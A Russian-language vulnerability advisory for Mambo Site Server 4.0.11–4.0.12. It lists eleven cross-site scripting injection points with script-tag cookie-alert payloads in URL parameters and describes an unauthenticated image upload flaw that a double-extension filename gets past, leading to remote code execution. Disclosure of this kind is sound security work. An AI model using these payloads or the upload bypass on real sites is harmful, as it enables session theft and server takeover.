Mambo Site Server – портальная Web система, написанная на PHP. В программе обнаружено несколько уязвимостей, включая XSS уязвимость и удаленное выполнение кода с привилегиями сервера.

1. XSS существует в следующих файлах: 

administrator/popups/sectionswindow.php
(type=web&link=»<script>alert(document.cookie)</script>

administrator/gallery/gallery.php
(directory=»<script>alert(document.cookie)</script>)

administrator/gallery/navigation.php
(directory=»<script>alert(document.cookie)</script>)

administrator/gallery/uploadimage.php
(directory=»<script>alert(document.cookie)</script>)

administrator/gallery/view.php
(path=»<script>alert(document.cookie)</script>)

administrator/upload.php
(newbanner=1&choice=»<script>alert(document.cookie)</script>)

themes/mambosimple.php
(detection=detected&sitename=</title><script>alert(document.cookie)</script>
)

upload.php (type=»<script>alert(document.cookie)</script>)

emailfriend/emailarticle.php (id=»<script>alert(document.cookie)</script>)

emailfriend/emailfaq.php (id=»<script>alert(document.cookie)</script>)

emailfriend/emailnews.php (id=»<script>alert(document.cookie)</script>)

2. Удаленное выполнение произвольного кода обнаружено в сценарии uploadimage.php в административном каталоге: 

administrator/gallery/uploadimage.php

Этот файл позволяет любым удаленным пользователям загружать ‘изображения’ на сервер, не проверяя разрешения и осуществляя слабую проверку расширения файла. Атакующий может обмануть эту проверку и загрузить файл с именем типа r00t.jpg.php. 

Уязвимость обнаружена в Mambo Mambo Site Server 4.0.11-4.0.12.

Оставить мнение